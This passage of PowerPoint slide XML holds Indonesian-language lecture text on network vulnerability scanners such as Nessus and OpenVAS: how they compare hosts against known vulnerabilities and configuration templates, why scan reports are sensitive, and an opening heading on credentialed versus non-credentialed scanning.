            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Tenable Nessus (tenable.com/ products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenVAS (openvas.org), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, router, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hasil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyusun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyarankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274066529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Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
